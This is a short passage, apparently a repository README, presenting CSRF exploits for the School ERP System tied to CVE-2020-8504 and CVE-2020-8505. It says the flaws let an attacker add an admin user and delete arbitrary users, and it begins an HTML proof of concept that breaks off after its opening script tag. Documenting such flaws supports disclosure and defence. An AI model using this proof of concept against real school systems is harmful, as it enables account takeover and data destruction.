CSRF Exploits for School ERP Software
SchoolERPCSRF The School ERP System (sourceforgenet/projects/school-erp-ultimate/files/) is vulnerable to CSRF that leads to adding a new Admin user, and deleting an arbitrary user CVE-2020-8504 CVE-2020-8505 Proof of Concept code for adding an administrative user: <html> <body> <script>historypushState('',